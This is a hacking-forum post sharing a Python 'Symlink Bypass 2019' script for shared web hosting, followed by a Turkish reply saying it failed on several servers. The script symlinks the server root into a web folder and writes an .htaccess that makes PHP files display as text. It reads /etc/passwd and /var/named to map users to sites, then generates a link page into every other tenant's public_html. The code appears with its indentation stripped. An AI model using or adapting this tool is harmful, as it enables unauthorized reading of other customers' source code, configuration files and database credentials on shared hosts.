Priv8 Secure Server Symlink Bypass Script (1 Viewer)

Joined
May 26, 2018
Credits
615
Rating - 0%
python:
View hidden content is available for registered users!

#/*Python

import time
import os
import sys
import re

os.system("color C")

hta = "\nFile : .htaccess // Created Successfully!\n"
f = "All Processes Done!\nSymlink Bypassed Successfully!\n"
print "\n"
print "~"*60
print "Symlink Bypass 2019"
print " Special Greetz to"
print "~"*60

os.makedirs('trjnx')
os.chdir('trjnx')

susr=[]
sitex=[]
os.system("ln -s / tr.txt")

h = "Options Indexes FollowSymLinks\nDirectoryIndex tr.phtml\nAddType txt .php\nAddHandler txt .php"
m = open(".htaccess","w+")
m.write(h)
m.close()
print hta

sf = "<html><title>Symlink Bypass 2019 by 3NCRYP73D_GH057 </title><center><font color=black size=5>Symlink Bypass 2019<br><font size=4>Made By 3NCRYP73D_GH057 <br>Idea By My Mind</font></font><br><font color=black size=3><table>"

o = open('/etc/passwd','r')
o=o.read()
o = re.findall('/home/\w+',o)

for xusr in o:
xusr=xusr.replace('/home/','')
susr.append(xusr)
print "-"*30
xsite = os.listdir("/var/named")

for xxsite in xsite:
xxsite=xxsite.replace(".db","")
sitex.append(xxsite)
print f
path=os.getcwd()
if "/public_html/" in path:
path="/public_html/"
else:
path = "/html/"
counter=1
ips=open("tr.phtml","w")
ips.write(sf)

for fusr in susr:
for fsite in sitex:
fu=fusr[0:5]
s=fsite[0:5]
if fu==s:
ips.write("<tr><td style=font-family:calibri;font-weight:bold;color:black;>%s</td><td style=font-family:calibri;font-weight:bold;color:red;>%s</td><td style=font-family:calibri;font-weight:bold;><a href=tr.txt/home/%s%s target=_blank >%s</a></td>"%(counter,fusr,fusr,path,fsite))
counter=counter+1
 
C

Crysuder

Bunu 3-4 secureserverde denedim iş görmedi hiç işine yarayan oldumu şimdiye kadar ?
 

Users who are viewing this thread

Top